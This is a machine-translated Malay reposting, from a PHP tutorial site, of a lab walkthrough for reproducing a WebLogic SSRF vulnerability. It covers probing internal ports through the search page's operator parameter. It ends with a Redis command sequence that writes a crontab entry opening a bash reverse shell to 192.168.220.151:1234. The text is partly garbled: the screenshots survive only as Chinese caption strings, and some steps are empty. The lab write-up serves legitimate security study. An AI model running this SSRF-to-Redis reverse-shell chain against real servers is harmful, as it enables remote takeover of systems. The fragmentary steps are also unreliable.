masyarakat Belajar Perpustakaan Alatan Masa lapang

Melayu

Rumah > Operasi dan penyelenggaraan > Keselamatan > Cara Menghasilkan Semula Kerentanan SSRF Weblogic

Cara Menghasilkan Semula Kerentanan SSRF Weblogic

王林

Lepaskan： 2023-05-14 20:04:04

ke hadapan

1398 orang telah melayarinya

1. Gunakan docker untuk membina persekitaran

Pemasangan docker dan tutorial membina persekitaran: https://www.freebuf.com/sectool/252257.html

如何实现Weblogic SSRF漏洞复现

Akses port 7001 如何实现Weblogic SSRF漏洞复现

2. Langkah-langkah Pengeluaran Semula Kerentanan

1.

2. Semak tempat IBM

如何实现Weblogic SSRF漏洞复现

dan dapatkan bahawa ia adalah sambungan, yang bermaksud mungkin terdapat ssrf

如何实现Weblogic SSRF漏洞复现 3 tangkap paket. Klik Cari

如何实现Weblogic SSRF漏洞复现

4 Ubah suai sambungan parameter operator

如何实现Weblogic SSRF漏洞复现

<.>5. Hasil capaian

Mengakses pengembalian port yang tidak wujud tidak dapat disambungkan melalui HTTP 如何实现Weblogic SSRF漏洞复现

Mengakses port sedia ada mengembalikan kod status

如何实现Weblogic SSRF漏洞复现

Akses intranet

如何实现Weblogic SSRF漏洞复现

Gunakan redis untuk melantunkan muatan shell

set 1 "\n\n\n\n* * * * * root bash -i >& /dev/tcp/192.168.220.151/1234 0>&1\n\n\n\n"
config set dir /etc/
config set dbfilename crontab
save

Salin selepas log masuk

Atas ialah kandungan terperinci Cara Menghasilkan Semula Kerentanan SSRF Weblogic. Untuk maklumat lanjut, sila ikut artikel berkaitan lain di laman web China PHP!

Label berkaitan：

weblogic ssrf

sumber：yisu.com

Artikel sebelumnya：Bagaimana untuk melaksanakan tatasusunan dipetakan tanpa map() dalam Javascript Artikel seterusnya：Bagaimana untuk membetulkan ralat penggunaan bersih 1231

Kenyataan Laman Web ini

Kandungan artikel ini disumbangkan secara sukarela oleh netizen, dan hak cipta adalah milik pengarang asal. Laman web ini tidak memikul tanggungjawab undang-undang yang sepadan. Jika anda menemui sebarang kandungan yang disyaki plagiarisme atau pelanggaran, sila hubungi admin@php.cn

Artikel terbaru oleh pengarang